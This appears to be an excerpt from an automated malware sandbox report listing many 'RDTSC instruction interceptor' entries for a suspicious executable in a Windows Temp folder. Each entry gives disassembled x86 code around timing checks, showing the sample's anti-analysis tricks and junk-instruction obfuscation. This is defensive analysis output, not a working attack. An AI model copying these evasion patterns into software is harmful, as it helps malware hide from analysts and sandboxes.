Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC247B second address: CC24B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD398h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push esi 0x0000000c jno 00007F58F53CD38Ch 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC24B0 second address: CC24CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b push 820F44A3h 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC2BFA second address: CC2BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC30EA second address: CC3156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 jmp 00007F58F4C28981h 0x0000000c xchg eax, ebx 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F58F4C28978h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 nop 0x00000028 pushad 0x00000029 push edi 0x0000002a jmp 00007F58F4C2897Dh 0x0000002f pop edi 0x00000030 jnc 00007F58F4C2897Ch 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F58F4C2897Fh 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC32AF second address: CC32B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC337C second address: CC3384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC3384 second address: CC3397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jnc 00007F58F53CD386h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC36B0 second address: CC36C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C2897Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC36C2 second address: CC3716 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F58F53CD38Bh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F58F53CD388h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov edi, edx 0x0000002e xchg eax, ebx 0x0000002f jnp 00007F58F53CD38Ah 0x00000035 push ecx 0x00000036 pushad 0x00000037 popad 0x00000038 pop ecx 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC3716 second address: CC371A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC371A second address: CC3720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC6CCF second address: CC6D37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28982h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c clc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F58F4C28978h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov esi, ebx 0x0000002b jmp 00007F58F4C2897Bh 0x00000030 push 00000000h 0x00000032 mov edi, dword ptr [ebp+122D211Ch] 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F58F4C28985h 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC6D37 second address: CC6D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C79177 second address: C79182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C79182 second address: C79188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC8E22 second address: CC8EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F58F4C28987h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F58F4C28978h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov edi, ecx 0x0000002c push 00000000h 0x0000002e sub dword ptr [ebp+122D1F72h], edi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F58F4C28978h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 push edx 0x00000051 mov dword ptr [ebp+122D20A2h], edi 0x00000057 pop edi 0x00000058 xchg eax, ebx 0x00000059 push ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F58F4C2897Ch 0x00000061 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC8EBB second address: CC8ECB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CCA822 second address: CCA83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C28980h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CCA83A second address: CCA840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C7E2E3 second address: C7E2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CCC1CC second address: CCC1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD0A4B second address: CD0A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD19DD second address: CD1A74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F58F53CD398h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F58F53CD388h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F58F53CD388h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D20CAh], eax 0x0000004a push 00000000h 0x0000004c mov ebx, dword ptr [ebp+122D2B4Bh] 0x00000052 xchg eax, esi 0x00000053 pushad 0x00000054 jc 00007F58F53CD388h 0x0000005a pushad 0x0000005b popad 0x0000005c jmp 00007F58F53CD38Bh 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 pop eax 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD1A74 second address: CD1A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CCFD49 second address: CCFD4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD2E4A second address: CD2E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD2E50 second address: CD2E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD4E0B second address: CD4E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD2E54 second address: CD2E58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD5C35 second address: CD5C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD5ED8 second address: CD5EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD5EDE second address: CD5EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD8CEF second address: CD8CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD9DA4 second address: CD9DB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD8EFE second address: CD8F04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CD8F04 second address: CD8F21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F58F4C28988h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CDA040 second address: CDA04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CDBFB4 second address: CDBFBE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CDBFBE second address: CDBFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CDBFCC second address: CDBFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CDEE1D second address: CDEE7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F58F53CD388h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D214Bh], edx 0x0000002d mov dword ptr [ebp+122D3B47h], ebx 0x00000033 push 00000000h 0x00000035 mov ebx, dword ptr [ebp+122D1CFDh] 0x0000003b push 00000000h 0x0000003d jg 00007F58F53CD387h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 js 00007F58F53CD38Ch 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CDEE7A second address: CDEE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CDCFAC second address: CDCFB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CDCFB2 second address: CDCFB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CDEF71 second address: CDEF7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F58F53CD386h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CDEF7B second address: CDEF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CDF045 second address: CDF07A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F58F53CD398h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F58F53CD392h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CE58FE second address: CE5902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CE5D16 second address: CE5D2C instructions: 0x00000000 rdtsc 0x00000002 js 00007F58F53CD38Ch 0x00000008 jp 00007F58F53CD386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CE5D2C second address: CE5D3C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F58F4C28976h 0x00000008 jg 00007F58F4C28976h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CE5D3C second address: CE5D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CE5D42 second address: CE5D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F58F4C28976h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CE5D4C second address: CE5D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F58F53CD386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F58F53CD38Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CE9A7D second address: CE9A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CE9A81 second address: CE9A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F58F53CD38Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F58F53CD386h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CED13C second address: CED14A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CED14A second address: B12C4C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 5610F825h 0x00000012 jnc 00007F58F53CD387h 0x00000018 push dword ptr [ebp+122D0091h] 0x0000001e jp 00007F58F53CD39Eh 0x00000024 call dword ptr [ebp+122D1EFEh] 0x0000002a pushad 0x0000002b mov dword ptr [ebp+122D260Eh], edi 0x00000031 xor eax, eax 0x00000033 stc 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 mov dword ptr [ebp+122D260Eh], eax 0x0000003e mov dword ptr [ebp+122D2DBBh], eax 0x00000044 cmc 0x00000045 mov esi, 0000003Ch 0x0000004a mov dword ptr [ebp+122D260Eh], esi 0x00000050 mov dword ptr [ebp+122D260Eh], esi 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007F58F53CD396h 0x0000005f lodsw 0x00000061 cmc 0x00000062 mov dword ptr [ebp+122D28BBh], ecx 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c jmp 00007F58F53CD397h 0x00000071 jmp 00007F58F53CD398h 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a clc 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f je 00007F58F53CD386h 0x00000085 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C89F93 second address: C89F98 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C89F98 second address: C89F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C89F9E second address: C89FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C89FA9 second address: C89FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C89FAF second address: C89FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 js 00007F58F4C28976h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CF4CD7 second address: CF4CE1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F58F53CD386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CF4CE1 second address: CF4CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CF4CE7 second address: CF4CEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CF4645 second address: CF464B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CF464B second address: CF464F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CF4794 second address: CF479E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F58F4C28976h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CF479E second address: CF47AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
